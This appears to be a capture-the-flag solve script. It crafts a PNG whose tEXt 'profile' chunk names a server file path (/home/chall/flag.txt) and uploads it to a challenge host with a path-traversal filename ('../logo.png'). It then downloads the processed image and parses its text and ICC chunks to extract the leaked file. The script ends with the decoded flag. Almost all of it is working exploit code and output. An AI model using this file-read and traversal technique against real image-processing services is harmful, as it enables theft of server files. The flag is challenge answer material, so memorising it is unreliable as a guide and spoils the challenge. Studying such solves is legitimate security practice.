import struct, zlib, binascii
def chunk(t,d):
    return struct.pack('>I',len(d))+t+d+struct.pack('>I',binascii.crc32(t+d)&0xffffffff)
sig=b'\x89PNG\r\n\x1a\n'; ihdr=struct.pack('>IIBBBBB',1,1,8,6,0,0,0)
idat=zlib.compress(b'\x00\xff\xff\xff\xff')
text=b'profile'+b'\x00'+b'/home/chall/flag.txt'  # absolute path, no '@'
png=sig+chunk(b'IHDR',ihdr)+chunk(b'tEXt',text)+chunk(b'IDAT',idat)+chunk(b'IEND',b'')
open('leak_flag.png','wb').write(png)

BASE='http://play.scriptsorcerers.xyz:10265'
curl -sS -F 'file=@leak_flag.png;type=image/png;filename=../logo.png' "$BASE/upload"
curl -sS "$BASE/logo-sm.png" -o out.png

import io, re, zlib
b=open('out.png','rb').read(); f=io.BytesIO(b); assert f.read(8)==b'\x89PNG\r\n\x1a\n'
out=[]
while True:
    lb=f.read(4)
    if not lb: break
    L=int.from_bytes(lb,'big'); T=f.read(4); D=f.read(L); f.read(4)
    if T==b'tEXt':
        try: out.append(D.split(b'\x00',1)[1].decode('utf-8','ignore'))
        except: pass
    elif T==b'zTXt':
        try:
            _,rest=D.split(b'\x00',1)
            if rest[:1]==b'\x00': out.append(zlib.decompress(rest[1:]).decode('utf-8','ignore'))
        except: pass
    elif T==b'iTXt':
        p=D.split(b'\x00',5)
        if len(p)>=6:
            _,cf,_,_,_,txt=p
            if cf==b'\x01':
                try: txt=zlib.decompress(txt)
                except: pass
            out.append(txt.decode('utf-8','ignore'))
    elif T==b'iCCP':
        try:
            _,rest=D.split(b'\x00',1)
            if rest[:1]==b'\x00': out.append(zlib.decompress(rest[1:]).decode('utf-8','ignore'))
        except: pass
    if T==b'IEND': break
text='\n'.join(out)
m=re.search(r'scriptCTF\{[^}]+\}', text)
print(m.group(0) if m else text[:800])

7363726970744354467b7430305f6d7563685f6d343669635f6566336336366232313464657d0a
=> scriptCTF{t00_much_m46ic_ef3c66b214de}